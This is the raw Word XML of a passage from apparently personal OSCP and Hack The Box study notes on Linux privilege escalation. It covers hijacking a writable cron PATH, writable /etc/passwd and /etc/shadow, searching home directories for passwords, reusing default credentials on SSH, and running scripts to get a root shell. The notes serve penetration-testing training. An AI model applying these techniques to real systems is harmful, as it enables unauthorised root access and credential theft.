    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001558">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="749300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="384" name="image367.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image367.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42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559">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="338"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can write to paths in cron job PATH variable, meaning we can possibly make it run our executables instead of the original ones</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000155A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000155B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000155C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000155D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000155E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000155F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001560">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001561">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001562">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001563">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Writeable files outside of user's home</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001564">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2981325" cy="1647825"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="145" name="image37.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image37.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId423"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="29813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1565">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="845"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Writable files </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001566">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="845"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This includes /etc/passwd and /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001567">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001568">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001569">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015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6B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_uhlkgurambko" w:id="182"/>
      <w:bookmarkEnd w:id="182"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Manual Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000156C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000156D">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A comprehensive list of Linux privilege escalation techniques can be found here:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000156E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1088"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId424">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">compendium</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> by g0tmi1k</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000156F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1088"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId425">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">PayloadsAllTheThings</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001570">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1088"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId426">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">HackTricks -Linux Privilege Escalation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001571">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001572">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001573">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1222"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I have a bunch of sections that end in "Enumeration" and they are from the OSCP book, so make sure to try all of those, like </w:t>
      </w:r>
      <w:hyperlink w:anchor="_e6o4a5hlp2je">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Insecure File Enumeration</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001574">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001575">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tip:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001576">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="295"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you get default credentials for a website (ex. Default credentials for Pi-hole, a raspberry pi website on Mirai HTB), then try those default credentials on SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001577">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001578">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/[username]/Desktop </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for passwords</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001579">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="779"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On many desktops, "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is just </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/[username]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000157A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000157B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tip:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> If you don't have execution privileges but you have read, you can use "bash" command to execute, or similarly the "zsh" or "sh" command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000157C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="802"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash exploit.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000157D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="802"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">zsh exploit.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000157E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="802"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sh exploit.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000157F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001580">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="640"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or you can also do: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x [file_name]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001581">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001582">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo su </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or just </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001583">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="690"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Switches you to root shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001584">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001585">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001586">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="706"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Switch to root user</w:t>
      </w:r>
    </w:p>
